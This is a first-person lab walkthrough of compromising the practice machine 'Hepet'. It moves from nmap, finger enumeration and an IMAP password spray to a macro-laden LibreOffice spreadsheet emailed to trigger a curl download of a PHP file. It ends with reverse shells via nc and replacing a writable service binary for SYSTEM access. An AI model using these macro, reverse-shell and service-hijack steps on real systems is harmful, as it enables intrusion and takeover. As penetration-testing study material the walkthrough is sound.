Machine Information
- Machine Name: Hepet
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
Nmap scan report for 192.168.146.140
Host is up, received user-set (0.023s latency).
Scanned at 2024-10-11 11:37:10 +08 for 572s
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 Mercury/32 smtpd (Mail server account Maiser)
| smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME, SIZE 0, HELP
|_ Recognized SMTP commands are: HELO EHLO MAIL RCPT DATA RSET AUTH NOOP QUIT HELP VRFY SOML Mail server account is 'Maiser'.
79/tcp open finger syn-ack ttl 125 Mercury/32 fingerd
| finger: Login: Admin Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp open ph-addressbook syn-ack ttl 125 Mercury/32 PH addressbook server
106/tcp open pop3pw syn-ack ttl 125 Mercury/32 poppass service
110/tcp open pop3 syn-ack ttl 125 Mercury/32 pop3d
|_pop3-capabilities: APOP UIDL TOP EXPIRE(NEVER) USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 Mercury/32 imapd 4.62
|_imap-capabilities: OK AUTH=PLAIN CAPABILITY X-MERCURY-1A0001 complete IMAP4rev1
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| -----BEGIN CERTIFICATE-----
| MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls
| b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD
| VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj
| 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o
| J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT
| gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD
| gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd
| aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL
| vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_http-title: Time Travel Company Page
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds? syn-ack ttl 125
2224/tcp open http syn-ack ttl 125 Mercury/32 httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Mercury HTTP Services
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8000/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-title: Time Travel Company Page
11100/tcp open vnc syn-ack ttl 125 VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ Unknown security type (40)
20001/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc
| -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig
| -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore
| -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore
| -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config
| -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html
| -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json
| -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json
| -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static
|_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
|_ftp-bounce: bounce working!
33006/tcp open unknown syn-ack ttl 125
| fingerprint-strings:
| NULL:
|_ Host '192.168.251.146' is not allowed to connect to this MariaDB server
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
A lot of ports but lets have a look at port 8000 first.
Port 80
As usual, do go through enumeration like directory brute force and gathering useful information from the website.
After looking into everything, the only useful thing is some potential username was found with their job position. Somehow, there’s a user with weird job position.
But I have no idea what to do now, So I decided to look into other ports.
Port 79
This port could be used to perform username enumeration. I will be using this tool to perform username enumeration.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 192.168.210.140 | grep -v "is not known"
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Oct 13 13:42:37 2024 #########
admin@192.168.210.140: Login: admin Name: Mail System Administrator....[No profile information]..
agnes@192.168.210.140: Login: agnes Name: Agnes....[No profile information]..
charlotte@192.168.210.140: Login: charlotte Name: Charlotte....[No profile information]..
jonas@192.168.210.140: Login: jonas Name: Jonas....[No profile information]..
magnus@192.168.210.140: Login: magnus Name: Magnus..
martha@192.168.210.140: Login: martha Name: Martha....[No profile information]..
######## Scan completed at Sun Oct 13 13:43:43 2024 #########
10177 results.
10177 queries in 66 seconds (154.2 queries / sec)
It seems like I have some username found from port 79. I noticed that some of the username was actually same as the one that I found in the website. The weird job descrption user “jonas” is also found here. But its another dead end now, So I decided to move on to another port.
port 143
Since the jonas job description is weird, I assume it’s a password and I decided to spray it in each of the ports. Somehow, it works on port 143 which has something to do with mail server.
1
2
3
4
5
6
7
8
9
10
hydra -l jonas -p SicMundusCreatusEst imap://192.168.210.140
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-13 14:00:45
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking imap://192.168.210.140:143/
[143][imap] host: 192.168.210.140 login: jonas password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-13 14:00:46
Time to access and have a look into it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
telnet 192.168.210.140 143
Trying 192.168.210.140...
Connected to 192.168.210.140.
Escape character is '^]'.
* OK localhost IMAP4rev1 Mercury/32 v4.62 server ready.
a1 login jonas SicMundusCreatusEst
a1 OK LOGIN completed.
a1 list "" *
* LIST (\NoInferiors) "/" INBOX
a1 OK LIST completed.
a1 select inbox
* 5 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Draft \Seen \Answered)
* OK [UIDVALIDITY 1728781961] UID Validity
* OK [UIDNEXT 6] Predicted next UID
* OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flags
a1 OK [READ-WRITE] SELECT completed.
a1 fetch 1 body[text]
* 1 FETCH (BODY[text] {470}
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-502425.856729136
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Hey Jonas,
Please change your password, you cannot use the same password as your one liner description, just dont.
Thanks!
------MIME delimiter for sendEmail-502425.856729136--
)
It seems like I could read each of the email. Time to check the remaining email and hopefully getting a useful information.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
a1 fetch 2 body[text]
* 2 FETCH (BODY[text] {647}
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-808784.915440814
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Team,
We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility.
I will forward all the documents after checking everything is working okay.
Sorry for the inconveniences.
------MIME delimiter for sendEmail-808784.915440814--
)
a1 OK FETCH complete.
Based on this email, I think it’s time to perform client-side attacks which is sending a malicious documents into mail server and hope it execute since the email mentioned that the documents will be processed in mail server directly. Now I’ll need to look for the mail server email first before I could send a malicious file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
a1 fetch 2 body[header]
* 2 FETCH (BODY[header] {739}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
"magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 1 YGWVEUL6.CNM
)
a1 OK FETCH complete.
Now that I have the email, time to try create malicious .ods file and upload it.
Open the LibreOffice Calc and create a new macro in Tools > Marco > organize Macro > Basic and create a new macros by clicking the file name and new button.
Make sure that the macro is saved inside the malicious file. Time to write my own macro to get reverse shell. I tried a lot of different option and found one that actually make it work.
1
2
3
4
5
6
Sub Main
Shell("curl 192.168.45.177:8000/vuln.php -o C:\xampp\htdocs\vuln.php")
End Sub
The method that I used is uploading a php file into web service and get RCE from there as I tried getting a reverse shell but it did not work. After saving the malicious file, go to Tools > Customize > Events and look for Open Document and assigned the created macro.
After everything is done, just save the malicious file and try to upload it. Also remember to prepare a http server with the vuln.php in the server for uploading it into the server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
swaks --to mailadmin@localhost --from jonas@localhost --server 192.168.237.140:25 --header "Subject: a spreadsheet" --body "Please check this spreadsheet" --attach @exploit.ods
=== Trying 192.168.237.140:25...
=== Connected to 192.168.237.140.
<- 220 localhost ESMTP server ready.
-> EHLO kali
<- 250-localhost Hello kali; ESMTPs are:
<- 250-TIME
<- 250-SIZE 0
<- 250 HELP
-> MAIL FROM:<jonas@localhost>
<- 250 Sender OK - send RCPTs.
-> RCPT TO:<mailadmin@localhost>
<- 250 Recipient OK - send RCPT or DATA.
-> DATA
<- 354 OK, send data, end with CRLF.CRLF
-> Date: Mon, 14 Oct 2024 15:22:44 +0800
-> To: mailadmin@localhost
-> From: jonas@localhost
-> Subject: a spreadsheet
-> Message-Id: <20241014152244.103714@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_103714"
->
-> ------=_MIME_BOUNDARY_000_103714
-> Content-Type: text/plain
->
-> Please check this spreadsheet
-> ------=_MIME_BOUNDARY_000_103714
...
...
1
2
3
4
uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.237.140 - - [14/Oct/2024 15:30:03] "GET /vuln.php HTTP/1.1" 200 -
After confirming the file is uploaded, I reconfirm in the website to make sure my vulnerable php file is uplaoded by going to the website.
It works, now it’s time to get reverse shell. I just upload my own nc.exe and use that to get reverse shell.
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.237.140] 49330
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>whoami
whoami
hepet\ela arwel
Since I’m not administrator user, time to perform privilege escalation.
Privilege Escalation
I started with winpeas and read the information. It seems like I have some interesting folder in my current user directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Users\Ela Arwel>dir
dir
Volume in drive C has no label.
Volume Serial Number is A41E-B108
Directory of C:\Users\Ela Arwel
12/02/2021 09:44 AM <DIR> .
12/02/2021 09:44 AM <DIR> ..
12/01/2021 04:07 PM <DIR> 3D Objects
05/17/2021 01:53 PM 1,113 check_email.ps1
12/01/2021 04:07 PM <DIR> Contacts
04/13/2022 03:35 AM <DIR> Desktop
04/13/2022 03:31 AM <DIR> Documents
04/13/2022 02:48 AM <DIR> Downloads
12/01/2021 04:07 PM <DIR> Favorites
12/01/2021 04:07 PM <DIR> Links
12/01/2021 04:07 PM <DIR> Music
10/16/2020 03:25 PM <DIR> OneDrive
12/01/2021 04:07 PM <DIR> Pictures
12/01/2021 04:07 PM <DIR> Saved Games
12/01/2021 04:07 PM <DIR> Searches
10/20/2020 10:38 AM <DIR> Veyon
12/01/2021 04:07 PM <DIR> Videos
1 File(s) 1,113 bytes
16 Dir(s) 15,536,615,424 bytes free
I have a directory named Veyon, I then go through the directory as well as googling for useful information. I managed to find this which seems useful.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Users\Ela Arwel\Veyon>sc qc VeyonService
sc qc VeyonService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeyonService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Ela Arwel\Veyon\veyon-service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Veyon Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
It seems like the binary path is unquoted but I do not have access to write files at C:\Users\ directory. Since the whole Veyon directory is in my current user, I then check if I have access to modify the veyon-service.exe.
1
2
3
4
5
6
7
C:\Users\Ela Arwel\Veyon>icacls "C:\Users\Ela Arwel\Veyon\veyon-service.exe"
icacls "C:\Users\Ela Arwel\Veyon\veyon-service.exe"
C:\Users\Ela Arwel\Veyon\veyon-service.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
HEPET\Ela Arwel:(I)(F)
Successfully processed 1 files; Failed processing 0 files
Yeap, I have full access which means I could just modify it into my own vulnerable exe. I wrote my own vulnerable C code and compile into exe.
1
2
3
4
5
6
7
8
9
10
#include <stdlib.h>
int main ()
{
int i;
i = system ("C:\\xampp\\htdocs\\nc.exe 192.168.45.177 1235 -e cmd");
return 0;
}
1
x86_64-w64-mingw32-gcc a.c -o test.exe
After compiling, just transfer to the victim machine.
1
2
3
4
5
C:\Users\Ela Arwel\Veyon>curl 192.168.45.177/test.exe -o veyon-service.exe
curl 192.168.45.177/test.exe -o veyon-service.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 110k 100 110k 0 0 110k 0 0:00:01 --:--:-- 0:00:01 1006k
Now I could just restart the service and gain reverse shell.
1
2
3
4
5
C:\Users\Ela Arwel\Veyon>sc stop VeyonService
sc stop VeyonService
[SC] OpenService FAILED 5:
Access is denied.
It seems like I could not restart the service. I then check if I have privilege to restart the whole machine since the service will auto start.
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\Users\Ela Arwel\Veyon>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Yeap, I have privilege to restart the machine. Time to restart and wait for the reverse shell.
1
2
C:\Users\Ela Arwel\Veyon>shutdown /r /t 0
shutdown /r /t 0
1
2
3
4
5
6
7
8
9
nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.237.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Volla ~ I managed to get administrator shell.
Things I learned from this machine
- client side attacks suck and hard to identify if the exploit work or not.
- if got RCE but unable to gain reverse shell (like from this client side attack), upload a vulnerable php or aspx file into the website.
- check user directory for useful information.
- PERMISSION IS EVERYTHING